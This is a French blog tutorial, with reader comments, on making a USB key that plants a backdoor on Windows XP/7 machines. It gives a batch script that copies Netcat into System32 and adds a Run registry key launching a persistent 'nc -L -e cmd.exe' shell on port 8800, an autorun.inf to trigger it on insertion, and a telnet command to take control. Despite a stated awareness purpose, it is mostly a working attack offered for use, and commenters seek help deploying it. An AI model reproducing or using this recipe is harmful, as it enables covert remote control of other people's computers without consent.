Prendre le contrôle d’un PC à distance avec une clé USB

FunInformatique Il y a 3 mois 4 minutes de lecture

comment injecter une backdoor avec une cle usb

Dernière mise à jour : 10 juillet 2023

Dans les articles précédents, nous avons vu comment créer une Clé USB rootkit qui récupère les mots de passe d’un ordinateur sous Windows. Aujourd’hui, nous allons voir comment créer une clé USB qui ouvre un backdoor sur une machine Windows.

Ce rootkit s’exécute automatiquement, crée une porte dérobée sur un PC Windows et vous permet de prendre le contrôle à distance.

Comme d'habitude l’objectif ce tutoriel, c'est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers.

Prendre le contrôle d'un PC à distance

Pour prendre le contrôle d'un PC à distance avec une Clé USB, il faut suivre les étapes ci-dessus:

Télécharger l'outil Netcat

Tout d'abord, nous allons créer un nouveau dossier sur notre clé USB. Ensuite nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP.

Vous pouvez aussi utiliser l'outil Cryptcat, le clone de Netcat, à la seule condition que ce dernier chiffre ses communications.

Télécharger Netcat pour windows

Apres le téléchargement de Netcat, on le dé-zippe dans le dossier crée récemment.

Créer un script .bat

Ensuite nous allons créer un fichier backdoor.bat. Ce petit fichier à deux objectifs:

Copier les fichiers du Netcat dans le dossier System32 de l’ordinateur cible.
Ajouter une valeur chaîne dans le registre du PC victime pour que notre porte dérobée se lance à chaque démarrage.

Pour cela, nous allons créer un nouveau document texte avec l'éditeur de texte Bloc-notes ou autre éditeur de texte et coller le code ci-dessous:

copy *.* "%SYSTEMROOT%/System32"
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v "backdoor" /t "REG_SZ" /d "%SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800"

Créer un fichier autorun

Maintenant, il nous reste de créer le fichier autorun.inf.

Dans cette étape, nous allons créer une nouvelle option dans la fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.

Pour réaliser ceci, ouvrez un nouveau document texte puis insérez ce code :

[autorun]
open=backdoor.bat
ACTION="donner un nom à cette action"

Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf

Mettre en ouvre le backdoor crée

Après l'insertion de la clé USB, vous pouvez à partir de n’importe quelle machine vous connectez sur le poste de la victime avec la commande suivante:

telnet 192.168.1.17 8800

192.168.1.17 désigne l’adresse IP de la machine distant qui vous faut remplacer. Et 8800 c'est le port utiliser pour se connecter.

Et voilà ! Avec cette technique vous serez en mesure de prendre le contrôle d'un PC à distance. Vous pouvez faire ce qui vous chante : ouvrir des fichiers, lancer une recherche, exécuter un programme...

Voici une liste des commandes pour bien manipuler la machine à distance: Lise des commandes Windows.

Pour vous déconnecter, tapez « logout » .

Faites-en bon usage.

Remarque: cette astuce ne fonctionne pas sous Windows 10 et Windows 11. Il fonctionne uniquement sur Windows 7 et Windows XP.

23 Questions / Réponses

Esdras dit :

16 mai 2022 à 22 h 36 min

J’ai pas totalement comment faire la connexion
Même si on enleve la clé on est tjrs connecté ?
Et aussi a quel niveau il fait mettre le code?
Vers l’invite de commande ou le netcap?

Répondre
anonyme dit :

23 avril 2020 à 15 h 02 min

bonjour est ce que il y a un moyen de faire la meme chose mais sur windows 10?

Répondre
rapetou dit :

17 janvier 2020 à 19 h 04 min

Bonjour quand je veut me connecter a netcat ou autre il me demande un code et je ne le trouve pas

Répondre
Inconnu dit :

16 décembre 2016 à 0 h 04 min

Je ne comprend pas. Où trouver le port ? et où faut-il insérer la commande telnet … dans la cmd ?

Répondre
Theo Wolfersperger dit :

1 novembre 2016 à 20 h 17 min

bonjour, le dossier autorun.inf ne fonctionne pas, je l’enregistre sous ,
autorun.inf et je le met directement sur ma clé usb, mais à l’insertion
de la clé usb, rien ne s’affiche. un peu d’aide svp ??Et la commande telnet 192.168.1.17 880 , il faut la taper dans CMD ??

Répondre
- annonyme dit :
  
  14 mai 2017 à 17 h 36 min
  
  tu est sur windows 10 je suppose? PARCE QUE SUR windows 10 ils on suprimer .inf car c’etait la porte ouverte a tout les hacker
  
  Répondre
GTA Production dit :

14 juin 2016 à 18 h 33 min

les liens sont mort

Répondre
- jean dit :
  
  29 août 2017 à 21 h 13 min
  
  non.
  
  Répondre
Juguet Patrick dit :

1 avril 2016 à 15 h 36 min

Ahmed bonjour,
Article très intérèssant, un seul souci ça ne fonctionne pas, j’explique mon problème.
J’ai un vieux pc xp sur lequel j’ai introduit la backdoor en suivant à la lettre ton tuto.
Lorsque je lance telnet sous ubuntu celui ci ne peut résoudre l’adresse ip du xp
telnet: could not resolve xxx.xxx.x.xx…8800/telnet: Name or service not
un ipconfig dans la console du xp me confirme pourtant que c’est la bonne.
Une idée ?
Par avance merci et bonne soirée

Répondre
Paul dit :

16 mars 2015 à 12 h 28 min

C’est pas un antislash qu’il doit y avoir là ?
copy *.* « %SYSTEMROOT%/System32 »
copy *.* « %SYSTEMROOT%/System32 »
copy *.* « %SYSTEMROOT%/System32 »
??
Sinon manque plus qu’a le configurer pour piquer l’IP de l’ordinateur cible 🙂

Répondre
Lerin dit :

5 février 2015 à 13 h 58 min

Bonjour, je m’intéresse à la sécurité informatique et j’aurais voulu savoir si on crée une backdoor dans un ordi. Cela pose un problème car on ouvre un port ici le 8800 , donc n’importe qui peut s’y connecter si il envoie des requetes et vois le port ?
Merci

Répondre
novice dit :

10 septembre 2014 à 14 h 16 min

Salut a tous . Excuser moi pour avoir totalement acces a ce ordinateur a distance , ai je besoin d’internet ?

Répondre
- Ahmed dit :
  
  26 septembre 2014 à 17 h 46 min
  
  Exactement, vous aurez besoin d’une connexion internet.
  
  Répondre
  - Killian Armand dit :
    
    29 avril 2015 à 23 h 04 min
    
    Bonjour, quand j’entre la commande dans NetCat, le programme retourne « lookup failed errno 1004 NO_NATA » quelque chose comme ça… Pouvez-vous m’aider svp?
B3 INV!SIBL3 dit :

29 août 2014 à 15 h 58 min

Bonjour. J’ai un petit soucis avec cette backdoor. J’ai suivi chaques étapes de la procédure, mais lorsque je branche ma clé USB dans un autre ordinateur, aucune option ne s’affiche pour ouvrir NetCat et avoir accès à mon propre ordinateur. Que dois-je faire alors ? Merci de votre réponse !

Répondre
- Max1truc dit :
  
  7 janvier 2017 à 20 h 35 min
  
  Bonjour,
  Il faut installer le logiciel portable « putty ».
  Dans « ip adress » : l’addresse ip de l’ordinateur cible
  Dans « port » : 8800
  Et dans « connection type » : telnet
  
  Répondre
Sean Poirier dit :

21 mai 2014 à 16 h 47 min

Faut-il absolument que le PC soit en fonction pour utiliser cela?

Répondre
amine dit :

20 mai 2014 à 21 h 04 min

Bonjour,quand j’ai mis les fichiers pour créer le backdoor sur la clé USB,tous mes documents se sont transformés en raccourcis,ils ne sont plus utilisables.HELP MEEEEEEEEEEEEEE!!

Répondre
Interested dit :

27 avril 2012 à 22 h 38 min

J’ai essayé d’accéder à ma machine XP en suivant la procédure mais marche pas…même en désactivant pare feu et antivirus

Répondre
- Ahmed dit :
  
  2 mai 2012 à 16 h 00 min
  
  Tu peux me donner le message d’erreur qui s’affiche quand tu essaie de te connecter avec telnet ?
  
  Répondre
  - Ben Arfa Wy dit :
    
    20 novembre 2012 à 20 h 35 min
    
    Moi surtout j’aimerais savoir comment obtenir l’adresse ip du pc dont l’on a installer le backdoor ?
  - Ahmed dit :
    
    10 février 2013 à 19 h 02 min
    
    Si tu veux obtenir l’adresse ip d’un pc dans un réseau local, il suffit d’ouvrir le cmd et de taper la commande net view après tu fais un ping sur le nom de la machine.
    Sinon si tu as le pc entre tes mains, tu peux simplement taper dans l’invite de commande : ipconfig et tu auras l’adresse IP
Corentin Coustham dit :

18 mars 2012 à 18 h 46 min

Quelle est la commande sous ubuntu ?

Répondre